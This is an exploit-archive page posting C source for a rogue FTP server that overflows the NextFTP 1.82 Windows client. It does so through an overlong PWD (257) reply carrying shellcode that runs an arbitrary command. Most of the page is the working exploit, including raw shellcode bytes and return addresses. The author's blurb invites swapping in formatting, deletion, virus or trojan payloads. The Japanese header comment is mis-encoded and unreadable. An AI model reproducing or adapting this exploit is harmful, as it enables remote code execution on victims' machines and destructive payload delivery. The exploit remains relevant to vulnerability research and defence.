global security disclosure

ex_nextftp.c

ex_nextftp.c
Posted Nov 5, 1999
Authored by shadowpenguin

We found the overflow bug of NextFTP Ver1.82. It overflows when that receives the long message of CWD reply. This exploit code execute any command on the target windows, but, if you modify the exploit code, you can send any codes such as the format or remove program, virus, trojan, and so on.

tags | exploit, overflow, trojan, virus
systems | windows
MD5 | db519da823a966c611543097194f6ba9

ex_nextftp.c

Change Mirror Download
/*=============================================================================
Next FTP Exploit Server Rev.2
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (unewn4th@usa.net)

[‰ðà]
NextFTP Ver1.82 ‚ÌCWDˆ—‚ɃI[ƒo[ƒtƒ[ƒoƒO‚ª‚ ‚è‚Ü‚µ‚½BFTPƒT[ƒo‘¤
‚Åexploit code‚𑗐M‚·‚邱‚Ƃɂæ‚èAƒNƒ‰ƒCƒAƒ“ƒg‚ɑ΂µ‚Ä”CˆÓ‚̏ˆ—‚ðŽÀs
‚³‚¹‚邱‚Æ‚ª‚Å‚«‚Ü‚·B‚±‚̃Tƒ“ƒvƒ‹‚ÍUNIX‚Å“®ì‚µA”CˆÓ‚̃†[ƒU–¼AƒpƒX
ƒ[ƒh‚ðŽó—‚µAexploit_code‚𑗐M‚·‚éƒgƒƒC‚Å‚·B‚±‚̃Tƒ“ƒvƒ‹‚ł́A
exploit_code‚́AƒNƒ‰ƒCƒAƒ“ƒgã‚Ì”CˆÓ‚̃Rƒ}ƒ“ƒh‚ÌŽÀs‚ðs‚¤‚à‚̂ł·‚ªA
exploit_code‚ð‘g‘Ö‚¦‚邱‚Ƃɂæ‚è”CˆÓ‚̃tƒ@ƒCƒ‹íœAƒEƒCƒ‹ƒXŠ´õ‚Ȃǂà
‰Â”\‚Å‚·(‹Ö‘¥ƒR[ƒh: 00H, 22H, FFH)B
[“®ìŠm”F]
EƒT[ƒo TurboLinux3.0 (‘å’ï‚ÌUNIX‚ʼnÂ)
EƒNƒ‰ƒCƒAƒ“ƒg Windows98
EFTP NextFTP Ver1.82
[ƒT[ƒoÝ’è]
•W€‚Ìftpd‚ð’âŽ~‚µ‚Ü‚·B‚»‚ÌŒãAƒRƒ“ƒpƒCƒ‹‚µ‚ÄŽÀs‚·‚ê‚ÎOK‚Å‚·B
(ƒRƒ“ƒpƒCƒ‹—á:gcc ex_nextftp.c -lsocket)
‚Ü‚½Aƒ^[ƒQƒbƒgƒNƒ‰ƒCƒAƒ“ƒg‚ÌWindows C Runtime Library‚̃o[ƒWƒ‡ƒ“‚É
‚æ‚Á‚āAƒ\[ƒX
#define DLL_VER_PSYSTEM V5_00_7022_SYSTEM
#define DLL_VER_PEXIT V5_00_7022_EXIT
‚̍s‚ð•ύX‚µ‚Ä‚­‚¾‚³‚¢Bƒo[ƒWƒ‡ƒ“‚́A
c:\windows\system\msvcrt.dll
‚ð‰EƒNƒŠƒbƒNAƒvƒƒpƒeƒB‚ÅŠm”F‚Å‚«‚Ü‚·B
‚Ü‚½AƒfƒBƒtƒHƒ‹ƒg‚Å‚Ínotepad.exe‚ð‹N“®‚µ‚Ä‚¢‚Ü‚·‚ªA
#define EXPCMD "notepad.exe"
‚̍s‚ð•ύX‚·‚ê‚΁A”CˆÓ‚̃Rƒ}ƒ“ƒh‚ðŽÀs‚³‚¹‚邱‚Æ‚ª‚Å‚«‚Ü‚·B

¦ FFFFTP Ver1.66‚É‚à“¯—l‚̃ZƒLƒ…ƒŠƒeƒBƒz[ƒ‹‚ª‚ ‚è‚Ü‚·B
‚±‚Ìexploit‚ÍŽg—p‚Å‚«‚Ü‚¹‚ñ‚ªAJumpingAddress‚̕ύX‚Å“®ì‚·‚邯Žv‚¢‚Ü‚·B
=============================================================================
*/
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <errno.h>
#include <unistd.h>
#include <netinet/in.h>
#include <limits.h>
#include <netdb.h>
#include <arpa/inet.h>

#define V5_00_7128_SYSTEM 0xc1a0
#define V5_00_7128_EXIT 0x8bb0
#define V5_00_7022_SYSTEM 0x888d
#define V5_00_7022_EXIT 0x39ef
#define V6_00_8168_0_SYSTEM 0x888d
#define V6_00_8168_0_EXIT 0x39ef
#define V6_00_8397_0_SYSTEM 0x9824
#define V6_00_8397_0_EXIT 0x5504

#define BANNER "ftp.trojan.ac.jp FTP server ready."
#define EXPCMD "notepad.exe"
#define DLL_VER_PSYSTEM V5_00_7022_SYSTEM
#define DLL_VER_PEXIT V5_00_7022_EXIT

int get_connection(socket_type, port, listener)
int socket_type;
int port;
int *listener;
{
struct sockaddr_in address;
struct sockaddr_in acc;
int listening_socket;
int connected_socket = -1;
int new_process;
int reuse_addr = 1;
int acclen=sizeof(acc);

memset((char *) &address, 0, sizeof(address));
address.sin_family = AF_INET;
address.sin_port = htons(port);
address.sin_addr.s_addr = htonl(INADDR_ANY);
listening_socket = socket(AF_INET, socket_type, 0);
if (listening_socket < 0) {
perror("socket");
exit(1);
}
if (listener != NULL) *listener = listening_socket;
setsockopt(listening_socket,SOL_SOCKET,SO_REUSEADDR,
&reuse_addr,sizeof(reuse_addr));
if (bind(listening_socket,(struct sockaddr *)&address,
sizeof(address)) < 0) {
perror("bind");
close(listening_socket);
exit(1);
}
if (socket_type == SOCK_STREAM){
listen(listening_socket, 5);
while(connected_socket < 0){
connected_socket=accept(listening_socket,&acc,&acclen);
if (connected_socket < 0){
if (errno != EINTR){
perror("accept");
close(listening_socket);
exit(1);
}else continue;
}
new_process=fork();
if (new_process<0){
perror("fork");
close(connected_socket);
connected_socket = -1;
}else{
if (new_process == 0) {
close(listening_socket);
if (listener!=NULL) *listener = -1;
}else{
close(connected_socket);
connected_socket = -1;
}
}
}
return connected_socket;
}else return listening_socket;
}

int sock_write(sockfd, buf, count)
int sockfd;
char *buf;
size_t count;
{
size_t bytes_sent = 0;
int this_write;

while (bytes_sent < count) {
do
this_write = write(sockfd, buf, count - bytes_sent);
while ( (this_write < 0) && (errno == EINTR) );
if (this_write <= 0)
return this_write;
bytes_sent += this_write;
buf += this_write;
}
return count;
}

int sock_gets(sockfd, str, count)
int sockfd;
char *str;
size_t count;
{
int bytes_read;
int total_count = 0;
char *current_position;
char last_read = 0;

current_position = str;
while (last_read != 10) {
bytes_read = read(sockfd, &last_read, 1);
if (bytes_read <= 0) return -1;
if ( (total_count < count)
&& (last_read !=0)
&& (last_read != 10)
&& (last_read !=13) ) {
current_position[0] = last_read;
current_position++;
total_count++;
}
}
if (count > 0)
current_position[0] = 0;
return total_count;
}

char exploit_code[200]={
0xb4,0x20,0xb4,0x21,0x8b,0xcc,0x83,0xe9,
0x04,0x8b,0x19,0x33,0xc9,0x66,0xb9,0x10,
0x10,0x80,0x3b,0xb4,0x75,0x12,0x80,0x7b,
0x01,0x20,0x75,0x0c,0x80,0x7b,0x02,0xb4,
0x75,0x06,0x80,0x7b,0x03,0x21,0x74,0x03,
0x43,0xe2,0xe6,0x33,0xc0,0xb0,0x31,0x03,
0xd8,0xb4,0xfe,0x80,0xc4,0x01,0x88,0x63,
0x3b,0x88,0x63,0x3c,0x88,0x63,0x3d,0x88,
0x63,0x24,0x88,0x63,0x36,0xeb,0x23,0x5b,
0x53,0x32,0xe4,0x83,0xc3,0x0c,0x88,0x23,
0xb8,0x8d,0x88,0x01,0x78,0xee,0xd0,0x33,
0xc0,0x50,0xb4,0x78,0xc1,0xe0,0x10,0x33,
0xdb,0x66,0xbb,0xef,0x39,0x0b,0xc3,0xee,
0xd0,0x90,0xe8,0xd8,0x90,0x90,0x90,0x00};

int main(argc, argv)
int argc;
char *argv[];
{
int sock,listensock;
char buffer[1024];
char name[1024];
char code[1000];
static char xxx[20000];
static char xx2[20000];
unsigned int i,k,ip;
int ver_system,ver_exit;

sock = get_connection(SOCK_STREAM, 21, &listensock);

/* Banner send */
memset(xxx,41,10000);
xxx[10000]=0;
sprintf(xx2,"220 %s \x0d\x0a",BANNER);
sock_write(sock,xx2,strlen(xx2));

/* User ident */
sock_gets(sock,buffer,1024);
strcpy(name,buffer+5);
sprintf(buffer,"331 Password required for %s.\x0d\x0a",name);
sock_write(sock,buffer,strlen(buffer));
sock_gets(sock,buffer,1024);
sprintf(buffer,"230 User %s logged in.\x0d\x0a",name);
sock_write(sock,buffer,strlen(buffer));

/* get PWD */
sock_gets(sock,buffer,1024);

/* EXPLOT */
ver_system=DLL_VER_PSYSTEM;
ver_exit=DLL_VER_PEXIT;

memset(xxx,0x90,10000);
k=512;
if (ver_system==V6_00_8397_0_SYSTEM)
ip=0x006bcb8c+300;
else
ip=0x006bce50+300;

xxx[k+3]=(ip>>24)&0xff;
xxx[k+2]=(ip>>16)&0xff;
xxx[k+1]=(ip>>8)&0xff;
xxx[k]=ip&0xff;

strcpy(code,exploit_code);
code[0x4d]=strlen(EXPCMD);
strcpy(code+strlen(code),EXPCMD);

code[81]=ver_system&0xff;
code[82]=(ver_system>>8)&0xff;
code[99]=ver_exit&0xff;
code[100]=(ver_exit>>8)&0xff;
for (i=0;i<strlen(code);i++)
xxx[i+350]=code[i];

xxx[1024]=0;
sprintf(xx2,"257 \"%s\" is current directory.\x0d\x0a",xxx);
sock_write(sock,xx2,strlen(xx2));
sock_gets(sock,buffer,1024);
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2012

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    37 Files
  • 2
    May 2nd
    53 Files
  • 3
    May 3rd
    33 Files
  • 4
    May 4th
    4 Files
  • 5
    May 5th
    10 Files
  • 6
    May 6th
    17 Files
  • 7
    May 7th
    19 Files
  • 8
    May 8th
    36 Files
  • 9
    May 9th
    34 Files
  • 10
    May 10th
    35 Files
  • 11
    May 11th
    20 Files
  • 12
    May 12th
    18 Files
  • 13
    May 13th
    11 Files
  • 14
    May 14th
    27 Files
  • 15
    May 15th
    58 Files
  • 16
    May 16th
    54 Files
  • 17
    May 17th
    25 Files
  • 18
    May 18th
    53 Files
  • 19
    May 19th
    9 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    25 Files
  • 22
    May 22nd
    32 Files
  • 23
    May 23rd
    35 Files
  • 24
    May 24th
    26 Files
  • 25
    May 25th
    25 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2012 Packet Storm. All rights reserved.

close